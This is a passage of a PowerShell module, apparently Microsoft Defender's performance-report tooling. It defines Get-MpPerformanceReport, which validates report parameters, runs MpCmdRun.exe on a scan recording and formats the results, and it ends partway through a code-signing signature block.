-TopScans:10 -MaxStartTime:"5/14/2022 7:01:11 AM" -MinEndTime:"5/14/2022 7:01:41 AM" .EXAMPLE # Find top 10 scans with longest durations, impacting the current interval, that started between MinStartTime and MaxStartTime, and ended later than MinEndTime. Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopScans:10 -MinStartTime:"5/14/2022 7:00:00 AM" -MaxStartTime:"5/14/2022 7:01:11 AM" -MinEndTime:"5/14/2022 7:01:41 AM" .EXAMPLE # Find top 10 scans with longest durations, impacting the current interval, that started before MaxStartTime, and ended between MinEndTime and MaxEndTime. Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopScans:10 -MaxStartTime:"5/14/2022 7:01:11 AM" -MinEndTime:"5/14/2022 7:01:41 AM" -MaxEndTime:"5/14/2022 7:02:00 AM" .EXAMPLE # Find top 10 scans with longest durations, impacting the current interval, that started between MinStartTime and MaxStartTime, and ended between MinEndTime and MaxEndTime. Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopScans:10 -MinStartTime:"5/14/2022 7:00:00 AM" -MaxStartTime:"5/14/2022 7:01:11 AM" -MinEndTime:"5/14/2022 7:01:41 AM" -MaxEndTime:"5/14/2022 7:02:00 AM" .EXAMPLE # Find top 10 scans with longest durations that both start and end between MinStartTime and MaxEndTime, using DateTime as raw numbers in FILETIME format, e.g. from -Raw report format: Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopScans:10 -MinStartTime:([DateTime]::FromFileTime(132969744714304340)) -MaxEndTime:([DateTime]::FromFileTime(132969745000971033)) .EXAMPLE # Find top 10 scans with longest durations between MinEndTime and MaxStartTime, possibly partially overlapping this period, using DateTime as raw numbers in FILETIME format, e.g. from -Raw report format: Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopScans:10 -MinEndTime:([DateTime]::FromFileTime(132969744714304340)) -MaxStartTime:([DateTime]::FromFileTime(132969745000971033)) .EXAMPLE # Display a summary or overview of the scans captured in the trace, in addition to the information displayed regularly through other arguments. Output is influenced by time interval arguments MinStartTime and MaxEndTime. Get-MpPerformanceReport -Path:.\Defender-scans.etl [other arguments] -Overview #> function Get-MpPerformanceReport { [CmdletBinding()] param( # Specifies the location of Microsoft Defender Antivirus performance recording to analyze. [Parameter(Mandatory=$true, Position=0, ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true, HelpMessage="Location of Microsoft Defender Antivirus performance recording.")] [ValidateNotNullOrEmpty()] [string]$Path, # Requests a top files report and specifies how many top files to output, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopFiles = 0, # Specifies how many top scans to output for each top file, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopScansPerFile = 0, # Specifies how many top processes to output for each top file, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopProcessesPerFile = 0, # Specifies how many top scans to output for each top process for each top file, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopScansPerProcessPerFile = 0, # Requests a top paths report and specifies how many top entries to output, sorted by "Duration". This is called recursively for each directory entry. Scans are grouped hierarchically per folder and sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopPaths = 0, # Specifies the maxmimum depth (path-wise) that will be used to grop scans when $TopPaths is used. [ValidateRange(1,1024)] [int]$TopPathsDepth = 0, # Specifies how many top scans to output for each top path, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopScansPerPath = 0, # Specifies how many top files to output for each top path, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopFilesPerPath = 0, # Specifies how many top scans to output for each top file for each top path, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopScansPerFilePerPath = 0, # Specifies how many top extensions to output for each top path, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopExtensionsPerPath = 0, # Specifies how many top scans to output for each top extension for each top path, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopScansPerExtensionPerPath = 0, # Specifies how many top processes to output for each top path, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopProcessesPerPath = 0, # Specifies how many top scans to output for each top process for each top path, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopScansPerProcessPerPath = 0, # Requests a top extensions report and specifies how many top extensions to output, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopExtensions = 0, # Specifies how many top scans to output for each top extension, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopScansPerExtension = 0, # Specifies how many top paths to output for each top extension, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopPathsPerExtension = 0, # Specifies how many top scans to output for each top path for each top extension, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopScansPerPathPerExtension = 0, # Specifies how many top files to output for each top extension, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopFilesPerExtension = 0, # Specifies how many top scans to output for each top file for each top extension, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopScansPerFilePerExtension = 0, # Specifies how many top processes to output for each top extension, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopProcessesPerExtension = 0, # Specifies how many top scans to output for each top process for each top extension, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopScansPerProcessPerExtension = 0, # Requests a top processes report and specifies how many top processes to output, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopProcesses = 0, # Specifies how many top scans to output for each top process in the Top Processes report, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopScansPerProcess = 0, # Specifies how many top files to output for each top process, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopFilesPerProcess = 0, # Specifies how many top scans to output for each top file for each top process, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopScansPerFilePerProcess = 0, # Specifies how many top extensions to output for each top process, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopExtensionsPerProcess = 0, # Specifies how many top scans to output for each top extension for each top process, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopScansPerExtensionPerProcess = 0, # Specifies how many top paths to output for each top process, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopPathsPerProcess = 0, # Specifies how many top scans to output for each top path for each top process, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopScansPerPathPerProcess = 0, # Requests a top scans report and specifies how many top scans to output, sorted by "Duration". [ValidateRange(0,([int]::MaxValue))] [int]$TopScans = 0, ## TimeSpan format: d | h:m | h:m:s | d.h:m | h:m:.f | h:m:s.f | d.h:m:s | d.h:m:.f | d.h:m:s.f => d | (d.)?h:m(:s(.f)?)? | ((d.)?h:m:.f) # Specifies the minimum duration of any scans or total scan durations of files, extensions and processes included in the report. # Accepts values like '0.1234567sec' or '0.1234ms' or '0.1us' or a valid TimeSpan. [ValidatePattern('^(?:(?:(\d+)(?:\.(\d+))?(sec|ms|us))|(?:\d+)|(?:(\d+\.)?\d+:\d+(?::\d+(?:\.\d+)?)?)|(?:(\d+\.)?\d+:\d+:\.\d+))$')] [string]$MinDuration = '0us', # Specifies the minimum start time of scans included in the report. Accepts a valid DateTime. [DateTime]$MinStartTime = [DateTime]::MinValue, # Specifies the minimum end time of scans included in the report. Accepts a valid DateTime. [DateTime]$MinEndTime = [DateTime]::MinValue, # Specifies the maximum start time of scans included in the report. Accepts a valid DateTime. [DateTime]$MaxStartTime = [DateTime]::MaxValue, # Specifies the maximum end time of scans included in the report. Accepts a valid DateTime. [DateTime]$MaxEndTime = [DateTime]::MaxValue, # Adds an overview or summary of the scans captured in the trace to the regular output. [switch]$Overview, # Specifies that the output should be machine readable and readily convertible to serialization formats like JSON. # - Collections and elements are not be formatted. # - TimeSpan values are represented as number of 100-nanosecond intervals. # - DateTime values are represented as number of 100-nanosecond intervals since January 1, 1601 (UTC). [switch]$Raw ) # # Validate performance recording presence # if (-not (Test-Path -Path:$Path -PathType:Leaf)) { $ex = New-Object System.Management.Automation.ItemNotFoundException "Cannot find path '$Path'." $category = [System.Management.Automation.ErrorCategory]::ObjectNotFound $errRecord = New-Object System.Management.Automation.ErrorRecord $ex,'PathNotFound',$category,$Path $psCmdlet.WriteError($errRecord) return } function ParameterValidationError { [CmdletBinding()] param ( [Parameter(Mandatory)] [string] $ParameterName, [Parameter(Mandatory)] [string] $ParentParameterName ) $ex = New-Object System.Management.Automation.ValidationMetadataException "Parameter '$ParameterName' requires parameter '$ParentParameterName'." $category = [System.Management.Automation.ErrorCategory]::MetadataError $errRecord = New-Object System.Management.Automation.ErrorRecord $ex,'InvalidParameter',$category,$ParameterName $psCmdlet.WriteError($errRecord) } # # Additional parameter validation # if ($TopFiles -eq 0) { if ($TopScansPerFile -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopScansPerFile' -ParentParameterName:'TopFiles' } if ($TopProcessesPerFile -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopProcessesPerFile' -ParentParameterName:'TopFiles' } } if ($TopProcessesPerFile -eq 0) { if ($TopScansPerProcessPerFile -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopScansPerProcessPerFile' -ParentParameterName:'TopProcessesPerFile' } } if ($TopPathsDepth -gt 0) { if (($TopPaths -eq 0) -and ($TopPathsPerProcess -eq 0) -and ($TopPathsPerExtension -eq 0)) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopPathsDepth' -ParentParameterName:'TopPaths or TopPathsPerProcess or TopPathsPerExtension' } } if ($TopPaths -eq 0) { if ($TopScansPerPath -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopScansPerPath' -ParentParameterName:'TopPaths' } if ($TopFilesPerPath -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopFilesPerPath' -ParentParameterName:'TopPaths' } if ($TopExtensionsPerPath -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopExtensionsPerPath' -ParentParameterName:'TopPaths' } if ($TopProcessesPerPath -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopProcessesPerPath' -ParentParameterName:'TopPaths' } } if ($TopFilesPerPath -eq 0) { if ($TopScansPerFilePerPath -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopScansPerFilePerPath' -ParentParameterName:'TopFilesPerPath' } } if ($TopExtensionsPerPath -eq 0) { if ($TopScansPerExtensionPerPath -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopScansPerExtensionPerPath' -ParentParameterName:'TopExtensionsPerPath' } } if ($TopProcessesPerPath -eq 0) { if ($TopScansPerProcessPerPath -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopScansPerProcessPerPath' -ParentParameterName:'TopProcessesPerPath' } } if ($TopExtensions -eq 0) { if ($TopScansPerExtension -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopScansPerExtension' -ParentParameterName:'TopExtensions' } if ($TopFilesPerExtension -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopFilesPerExtension' -ParentParameterName:'TopExtensions' } if ($TopProcessesPerExtension -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopProcessesPerExtension' -ParentParameterName:'TopExtensions' } if ($TopPathsPerExtension -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopPathsPerExtension' -ParentParameterName:'TopExtensions' } } if ($TopFilesPerExtension -eq 0) { if ($TopScansPerFilePerExtension -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopScansPerFilePerExtension' -ParentParameterName:'TopFilesPerExtension' } } if ($TopProcessesPerExtension -eq 0) { if ($TopScansPerProcessPerExtension -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopScansPerProcessPerExtension' -ParentParameterName:'TopProcessesPerExtension' } } if ($TopPathsPerExtension -eq 0) { if ($TopScansPerPathPerExtension -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopScansPerPathPerExtension' -ParentParameterName:'TopPathsPerExtension' } } if ($TopProcesses -eq 0) { if ($TopScansPerProcess -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopScansPerProcess' -ParentParameterName:'TopProcesses' } if ($TopFilesPerProcess -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopFilesPerProcess' -ParentParameterName:'TopProcesses' } if ($TopExtensionsPerProcess -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopExtensionsPerProcess' -ParentParameterName:'TopProcesses' } if ($TopPathsPerProcess -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopPathsPerProcess' -ParentParameterName:'TopProcesses' } } if ($TopFilesPerProcess -eq 0) { if ($TopScansPerFilePerProcess -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopScansPerFilePerProcess' -ParentParameterName:'TopFilesPerProcess' } } if ($TopExtensionsPerProcess -eq 0) { if ($TopScansPerExtensionPerProcess -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopScansPerExtensionPerProcess' -ParentParameterName:'TopExtensionsPerProcess' } } if ($TopPathsPerProcess -eq 0) { if ($TopScansPerPathPerProcess -gt 0) { ParameterValidationError -ErrorAction:Stop -ParameterName:'TopScansPerPathPerProcess' -ParentParameterName:'TopPathsPerProcess' } } if (($TopFiles -eq 0) -and ($TopExtensions -eq 0) -and ($TopProcesses -eq 0) -and ($TopScans -eq 0) -and ($TopPaths -eq 0) -and (-not $Overview)) { $ex = New-Object System.Management.Automation.ItemNotFoundException "At least one of the parameters 'TopFiles', 'TopPaths', 'TopExtensions', 'TopProcesses', 'TopScans' or 'Overview' must be present." $category = [System.Management.Automation.ErrorCategory]::InvalidArgument $errRecord = New-Object System.Management.Automation.ErrorRecord $ex,'InvalidArgument',$category,$wprProfile $psCmdlet.WriteError($errRecord) return } # Dependencies [string]$PlatformPath = (Get-ItemProperty -Path:'HKLM:\Software\Microsoft\Windows Defender' -Name:'InstallLocation' -ErrorAction:Stop).InstallLocation # # Test dependency presence # [string]$mpCmdRunCommand = "${PlatformPath}MpCmdRun.exe" if (-not (Get-Command $mpCmdRunCommand -ErrorAction:SilentlyContinue)) { $ex = New-Object System.Management.Automation.ItemNotFoundException "Cannot find '$mpCmdRunCommand'." $category = [System.Management.Automation.ErrorCategory]::ObjectNotFound $errRecord = New-Object System.Management.Automation.ErrorRecord $ex,'PathNotFound',$category,$mpCmdRunCommand $psCmdlet.WriteError($errRecord) return } # assemble report arguments [string[]]$reportArguments = @( $PSBoundParameters.GetEnumerator() | Where-Object { $_.Key.ToString().StartsWith("Top") -and ($_.Value -gt 0) } | ForEach-Object { "-$($_.Key)"; "$($_.Value)"; } ) [timespan]$MinDurationTimeSpan = ParseFriendlyDuration -FriendlyDuration:$MinDuration if ($MinDurationTimeSpan -gt [TimeSpan]::FromTicks(0)) { $reportArguments += @('-MinDuration', ($MinDurationTimeSpan.Ticks)) } $MaxEndTime = PadUserDateTime -UserDateTime:$MaxEndTime $MaxStartTime = PadUserDateTime -UserDateTime:$MaxStartTime $ret = ValidateTimeInterval -MinStartTime:$MinStartTime -MaxEndTime:$MaxEndTime -MaxStartTime:$MaxStartTime -MinEndTime:$MinEndTime if ($false -eq $ret.status) { return } [string[]]$intervalArguments = $ret.arguments if (($null -ne $intervalArguments) -and ($intervalArguments.Length -gt 0)) { $reportArguments += $intervalArguments } if ($Overview) { $reportArguments += "-Overview" } $report = (& $mpCmdRunCommand -PerformanceReport -RecordingPath $Path @reportArguments) | Where-Object { -not [string]::IsNullOrEmpty($_) } | ConvertFrom-Json $result = [PSCustomObject]@{} if (-not $Raw) { $result.PSTypeNames.Insert(0, 'MpPerformanceReport.Result') } if ($TopFiles -gt 0) { $reportTopFiles = @(if ($null -ne $report.TopFiles) { @($report.TopFiles | ConvertTo-DefenderScannedFilePathStats -Raw:$Raw) } else { @() }) $result | Add-Member -NotePropertyName:'TopFiles' -NotePropertyValue:$reportTopFiles if (-not $Raw) { Add-DefenderCollectionType -CollectionRef:([ref]$result.TopFiles) } } if ($TopPaths -gt 0) { $reportTopPaths = @(if ($null -ne $report.TopPaths) { @($report.TopPaths | ConvertTo-DefenderScannedPathsStats -Raw:$Raw) } else { @() }) $result | Add-Member -NotePropertyName:'TopPaths' -NotePropertyValue:$reportTopPaths if (-not $Raw) { Add-DefenderCollectionType -CollectionRef:([ref]$result.TopPaths) } } if ($TopExtensions -gt 0) { $reportTopExtensions = @(if ($null -ne $report.TopExtensions) { @($report.TopExtensions | ConvertTo-DefenderScannedFileExtensionStats -Raw:$Raw) } else { @() }) $result | Add-Member -NotePropertyName:'TopExtensions' -NotePropertyValue:$reportTopExtensions if (-not $Raw) { Add-DefenderCollectionType -CollectionRef:([ref]$result.TopExtensions) } } if ($TopProcesses -gt 0) { $reportTopProcesses = @(if ($null -ne $report.TopProcesses) { @($report.TopProcesses | ConvertTo-DefenderScannedProcessStats -Raw:$Raw) } else { @() }) $result | Add-Member -NotePropertyName:'TopProcesses' -NotePropertyValue:$reportTopProcesses if (-not $Raw) { Add-DefenderCollectionType -CollectionRef:([ref]$result.TopProcesses) } } if ($TopScans -gt 0) { $reportTopScans = @(if ($null -ne $report.TopScans) { @($report.TopScans | ConvertTo-DefenderScanInfo -Raw:$Raw) } else { @() }) $result | Add-Member -NotePropertyName:'TopScans' -NotePropertyValue:$reportTopScans if (-not $Raw) { Add-DefenderCollectionType -CollectionRef:([ref]$result.TopScans) } } if ($Overview) { if ($null -ne $report.Overview) { $reportOverview = $report.Overview | ConvertTo-DefenderScanOverview -Raw:$Raw $result | Add-Member -NotePropertyName:'Overview' -NotePropertyValue:$reportOverview if (-not $Raw) { $result.Overview.PSTypeNames.Insert(0, 'MpPerformanceReport.Overview') } } } $result } $exportModuleMemberParam = @{ Function = @( 'New-MpPerformanceRecording' 'Get-MpPerformanceReport' ) } Export-ModuleMember @exportModuleMemberParam # SIG # Begin signature block # MIImAgYJKoZIhvcNAQcCoIIl8zCCJe8CAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCABOtUhuRLDSJsH # 5LjfiBWymKYbjYNumRKF78V/LI3Gd6CCC1MwggTgMIIDyKADAgECAhMzAAAK7CQL # sju2bxocAAAAAArsMA0GCSqGSIb3DQEBCwUAMHkxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xIzAhBgNVBAMTGk1pY3Jvc29mdCBXaW5kb3dzIFBD # QSAyMDEwMB4XDTIzMTAxOTE5MTgwM1oXDTI0MTAxNjE5MTgwM1owcDELMAkGA1UE # BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc # BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEaMBgGA1UEAxMRTWljcm9zb2Z0 # IFdpbmRvd3MwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDxlYs7SirE # 2DMWmJDHmyPDmkzh+fLl2bNdYJFYVIxEDXmuYo7qVT/TlzRyHZNjfnCpNIN5BGy+ # tL1DHfbYMyeZ64rRBk5ZDyfxpC0PjuOKeo8l1Yp0DYH8o/tovvyg/7t7RBqawaFi # 8mo9wrD5ISkTwSSMv2itkTg00L+gE8awFU17AUmplCQ9mZ91C/9wLp9wH9bIBGm5 # LnsMVzGxaxLbcqzuyi0CUj0ANTuQNZUFNTvLWj/k3W3j7iiNZRDaniVqF2i7UEpU # Twl0A2/ET31/zrvHBzhJKaUtC31IicLI8HqTuUA96FAxGfczxleoZI6jXS2sWSYI # wU6YnckWSSAhAgMBAAGjggFoMIIBZDAfBgNVHSUEGDAWBgorBgEEAYI3CgMGBggr # BgEFBQcDAzAdBgNVHQ4EFgQUK97sk9qa9IVpYVlzmmULjVzY6akwRQYDVR0RBD4w # PKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEWMBQGA1UEBRMN # MjMwMDI4KzUwMTcwMjAfBgNVHSMEGDAWgBTRT6mKBwjO9CQYmOUA//PWeR03vDBT # BgNVHR8ETDBKMEigRqBEhkJodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNXaW5QQ0FfMjAxMC0wNy0wNi5jcmwwVwYIKwYBBQUHAQEE # SzBJMEcGCCsGAQUFBzAChjtodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2Nl # cnRzL01pY1dpblBDQV8yMDEwLTA3LTA2LmNydDAMBgNVHRMBAf8EAjAAMA0GCSqG # SIb3DQEBCwUAA4IBAQArGdljm580qkATgRqYVsgvfdFUkL/7TpOb8yh1h5vk2SEL # El5Bfz46bs3+ywayV/mXd8Y43M3yku5Dp7dMwRXkze6j4LJLpLQ4CMPN4fvtlPkb # w+fQmXkHjogsb4bcJo/aUKfLy4hGUbw+uqKBLx0RRIEj6Vj2m5W7lB+rdBl8hhtr # v5F4HYoy9lvXQhGGDwSsph+0uaZvCXSP7DOM3wOaYUQSNX6hYF5EHZsPrd334YGd # dTWIPRHrOWqg9FplGJumgZLgdlwY+WNZbXGCZwEQN3P88LTgrH/gmlSD0fHbZDyM # YZ77M6PFlz4eXvC6I7J3VemS8OoU4DzYgxSahDXFMIIGazCCBFOgAwIBAgIKYQxq # GQAAAAAABDANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMTAwNzA2MjA0MDIzWhcNMjUwNzA2MjA1MDIz # WjB5MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSMwIQYDVQQD # ExpNaWNyb3NvZnQgV2luZG93cyBQQ0EgMjAxMDCCASIwDQYJKoZIhvcNAQEBBQAD # ggEPADCCAQoCggEBAMB5uzqx8A+EuK1kKnUWc9C7B/Y+DZ0U5LGfwciUsDh8H9Az # VfW6I2b1LihIU8cWg7r1Uax+rOAmfw90/FmV3MnGovdScFosHZSrGb+vlX2vZqFv # m2JubUu8LzVs3qRqY1pf+/MNTWHMCn4x62wK0E2XD/1/OEbmisdzaXZVaZZM5Njw # NOu6sR/OKX7ET50TFasTG3JYYlZsioGjZHeYRmUpnYMUpUwIoIPXIx/zX99vLM/a # FtgOcgQo2Gs++BOxfKIXeU9+3DrknXAna7/b/B7HB9jAvguTHijgc23SVOkoTL9r # XZ//XTMSN5UlYTRqQst8nTq7iFnho0JtOlBbSNECAwEAAaOCAeMwggHfMBAGCSsG # AQQBgjcVAQQDAgEAMB0GA1UdDgQWBBTRT6mKBwjO9CQYmOUA//PWeR03vDAZBgkr # BgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUw # AwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBN # MEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0 # cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoG # CCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01p # Y1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDCBnQYDVR0gBIGVMIGSMIGPBgkrBgEE # AYI3LgMwgYEwPQYIKwYBBQUHAgEWMWh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9Q # S0kvZG9jcy9DUFMvZGVmYXVsdC5odG0wQAYIKwYBBQUHAgIwNB4yIB0ATABlAGcA # YQBsAF8AUABvAGwAaQBjAHkAXwBTAHQAYQB0AGUAbQBlAG4AdAAuIB0wDQYJKoZI # hvcNAQELBQADggIBAC5Bpoa1Bm/wgIX6O8oX6cn65DnClHDDZJTD2FamkI7+5Jr0 # bfVvjlONWqjzrttGbL5/HVRWGzwdccRRFVR+v+6llUIz/Q2QJCTj+dyWyvy4rL/0 # wjlWuLvtc7MX3X6GUCOLViTKu6YdmocvJ4XnobYKnA0bjPMAYkG6SHSHgv1QyfSH # KcMDqivfGil56BIkmobt0C7TQIH1B18zBlRdQLX3sWL9TUj3bkFHUhy7G8JXOqiZ # VpPUxt4mqGB1hrvsYqbwHQRF3z6nhNFbRCNjJTZ3b65b3CLVFCNqQX/QQqbb7yV7 # BOPSljdiBq/4Gw+Oszmau4n1NQblpFvDjJ43X1PRozf9pE/oGw5rduS4j7DC6v11 # 9yxBt5yj4R4F/peSy39ZA22oTo1OgBfU1XL2VuRIn6MjugagwI7RiE+TIPJwX9hr # cqMgSfx3DF3Fx+ECDzhCEA7bAq6aNx1QgCkepKfZxpolVf1Ayq1kEOgx+RJUeRry # DtjWqx4z/gLnJm1hSY/xJcKLdJnf+ZMakBzu3ZQzDkJQ239Q+J9iguymghZ8Zrzs # mbDBWF2osJphFJHRmS9J5D6Bmdbm78rj/T7u7AmGAwcNGw186/RayZXPhxIKXezF # ApLNBZlyyn3xKhAYOOQxoyi05kzFUqOcasd9wHEJBA1w3gI/h+5WoezrtUyFMYIa # BTCCGgECAQEwgZAweTELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEjMCEGA1UEAxMaTWljcm9zb2Z0IFdpbmRvd3MgUENBIDIwMTACEzMAAArsJAuy # O7ZvGhwAAAAACuwwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisG # AQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcN # AQkEMSIEIP1nRydeaI+1iJEMHgjg/lvzEqkxTM+0Vgz1fU+wYXo6MEIGCisGAQQB # gjcCAQwxNDAyoBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1p # Y3Jvc29mdC5jb20wDQYJKoZIhvcNAQEBBQAEggEAcGClrSoglNDQcN62/WS1R8I3 # RwetZsjmZJ952i52+ck3ypJqRBbJhDingd1ejbzsypsYW4PuFbockKlHLL3k4aAq # tHah9Vo9yd7QtxpZe3sOUjBsSTFERi7yAztpOwYEBNstQJP927K0QiIWUXqYh/V7 # EYivE0AC+/LxeBYozbyvD2Sz4wQ/f3b2d2YSW9RW3YN3IfTqysI2twnwi+ER4Fc/ # 6qNgF2MY9SWFerEXBdI75Slf1EmocucGLA9dvob+3328L1x8J1DkztC06ZcS5vtt # SusCW1a5mUZUxzbrQY84UONUxXkUOdjtAdLfPpA0O1SNGiSRcMAdFmakMp1gf6GC # F5QwgheQBgorBgEEAYI3AwMBMYIXgDCCF3wGCSqGSIb3DQEHAqCCF20wghdpAgED # MQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsqhkiG9w0BCRABBKCCAUEEggE9MIIBOQIB # AQYKKwYBBAGEWQoDATAxMA0GCWCGSAFlAwQCAQUABCBiOO9O5JDacZhQkDhZRhnL # JZwfEO4YeUvzRyzBGzb6/QIGZXsbtBRqGBMyMDI0MDEwNjAwNTcxNy4wMzVaMASA # AgH0oIHRpIHOMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQ # MA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u # MSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQL # Ex5uU2hpZWxkIFRTUyBFU046OTYwMC0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jv # c29mdCBUaW1lLVN0YW1wIFNlcnZpY2WgghHqMIIHIDCCBQigAwIBAgITMwAAAdj8 # SzOlHdiFFQABAAAB2DANBgkqhkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEG # A1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWlj # cm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFt # cCBQQ0EgMjAxMDAeFw0yMzA1MjUxOTEyNDBaFw0yNDAyMDExOTEyNDBaMIHLMQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNy # b3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBF # U046OTYwMC0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1w # 